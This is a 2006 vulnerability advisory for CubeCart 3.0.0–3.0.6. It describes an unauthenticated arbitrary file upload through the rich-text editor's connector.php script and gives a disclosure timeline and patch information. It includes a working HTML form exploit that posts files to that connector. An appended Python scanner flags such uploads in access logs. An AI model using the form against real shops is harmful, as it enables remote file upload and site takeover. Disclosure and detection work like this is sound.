Vulnerability CubeCart 3.0.0 - 3.0.6

Credit: NSA Group
Risk: High
Local: No
Remote: Yes
CWE: CWE-Other

CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

Advisory: NSAG-№197-23.02.2006
Research: NSA Group [Russian company on Audit of safety & Network security]
Site of Research: or
Product: CubeCart 3.0.0 - 3.0.6
Site of manufacturer:

The status:
19/11/2005 - Publication is postponed.
19/11/2005 - Manufacturer is notified.
21/11/2005 - Answer of the manufacturer.
24/12/2005 - Patch.
29/12/2005 - New version CubeCart 3.0.7.
21/02/2006 - Publication of vulnerability.

Original Advisory:

Risk: Critical

Description:
The vulnerability exists because the script /includes/rte/editor/filemanager/browser/default/connectors/php/connector.php does not sufficiently check the user's authorization. The authorization procedure include ("../includes/" is not included. A remote user can use a specially crafted URL to upload arbitrary files to the target system.

Impact:
The vulnerability allows a remote user to upload arbitrary files to the system.

Exploit:
<form action="http://host/cubedir/admin/includes/rte/editor/filemanager/browser/default/connectors/php/connector.php?Command=FileUpload&Type=File&CurrentFolder=/" method="POST" enctype="multipart/form-data">
  File Upload<br>
  <input id="txtFileUpload" type="file" name="NewFile">
  <br>
  <input type="submit" value="Upload">
</form>

Solution:
Download the patch or update to the new version 3.0.7.

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Our company is an independent auditor of software in the IT market. Independent software audits are now becoming standard practice, and we offer to make a released product as well protected as possible against various kinds of attacks by malicious users!
"Nemesis" © 2006
------------------------------------
Nemesis Security Audit Group © 2006.
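
For administrators of affected installations, the following added example (not part of the original advisory) scans web server access logs for POST requests to the connector script with Command=FileUpload, the request described above. The "combined" log format, the function name and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Connector path and query parameters are taken from the advisory text.
CONNECTOR = ("/includes/rte/editor/filemanager/browser/default/"
             "connectors/php/connector.php")

# Assumption: Apache/nginx "combined" access log format.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')

def find_connector_uploads(lines):
    """Return one record per POST to the connector with Command=FileUpload."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        url = urlsplit(m["target"])
        # Decode percent-escapes and collapse repeated slashes before matching.
        # Lower-casing is deliberately over-inclusive (case-insensitive hosts).
        path = re.sub(r"/+", "/", unquote(url.path)).lower()
        if not path.endswith(CONNECTOR):
            continue
        query = {k.lower(): v[-1] for k, v in parse_qs(url.query).items()}
        if query.get("command", "").lower() != "fileupload":
            continue
        hits.append({"ip": m["ip"], "time": m["ts"],
                     "status": int(m["status"]),
                     "folder": query.get("currentfolder", "")})
    return hits

# Constructed sample log lines (documentation IP ranges, hypothetical /shop/ root).
SAMPLE_LOG = [
    '203.0.113.7 - - [21/Feb/2006:10:15:02 +0000] "POST /shop/admin' + CONNECTOR
    + '?Command=FileUpload&Type=File&CurrentFolder=/ HTTP/1.1" 200 312 "-" "x"',
    '198.51.100.4 - - [21/Feb/2006:10:15:09 +0000] '
    '"GET /shop/index.php HTTP/1.1" 200 5120 "-" "x"',
    '203.0.113.9 - - [21/Feb/2006:10:16:40 +0000] "POST /shop/admin'
    + CONNECTOR.replace(".php", "%2Ephp")
    + '?Command=FileUpload&Type=File&CurrentFolder=%2F HTTP/1.1" 200 298 "-" "x"',
    '192.0.2.10 - - [21/Feb/2006:10:17:11 +0000] "GET /shop/admin' + CONNECTOR
    + ' HTTP/1.1" 200 0 "-" "x"',
]

if __name__ == "__main__":
    for hit in find_connector_uploads(SAMPLE_LOG):
        print(hit)
```

Any hit in the logs of an installation older than 3.0.7 warrants a review of the files present in the upload directories around the logged time.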
